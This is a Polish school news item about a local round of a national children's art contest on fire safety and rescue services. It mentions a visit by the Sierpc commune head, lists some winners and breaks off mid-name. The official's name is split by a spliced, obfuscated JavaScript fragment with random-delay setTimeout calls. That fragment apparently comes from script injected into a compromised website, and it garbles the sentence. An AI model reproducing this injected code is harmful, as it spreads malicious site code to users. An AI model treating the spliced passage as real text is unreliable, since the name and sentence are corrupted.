Konkurs „Powódź, pożar, dniem czy nocą – straż przychodzi ci z pomocą”

W dniu 1 kwietnia 2011 roku gościliśmy w naszej szkole Pana Wójta gminy Sierpc Tadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deusza Prekurata, którego to wizyta była wynikiem rozstrzygnięcia gminnego szczebla XIII edycji Ogólnopolskiego Konkursu Plastycznego 2010/2011 dla dzieci i młodzieży pod hasłem: „Powódź, pożar, dniem czy nocą – straż przychodzi ci z pomocą” organizowanego przez Komendanta Głównego Państwowej Straży Pożarnej.

Celem konkursu było zainteresowanie dzieci i młodzieży tematem szeroko pojętego bezpieczeństwa, rozwijanie świadomości występowania różnego rodzaju niebezpiecznych zdarzeń, umiejętności unikania ich oraz radzenia sobie w sytuacji zagrożenia. Konkurs miał za zadanie promować i poszerzać wiedzę, zarówno na temat bezpieczeństwa, jak i związanej z nim działalności służb ratowniczych, głównie straży pożarnej.
Cztery prace przeszły pomyślnie etap szkolny i gminny i zostały przekazane do etapu powiatowego. Zwycięzcami okazali się:
I grupa wiekowa (6-8 lat) :
I miejsce – Kinga Kozłowska
II miejsce – Patryk Olszewski
II grupa wiekowa (9-12 lat):
I miejsce – Aleks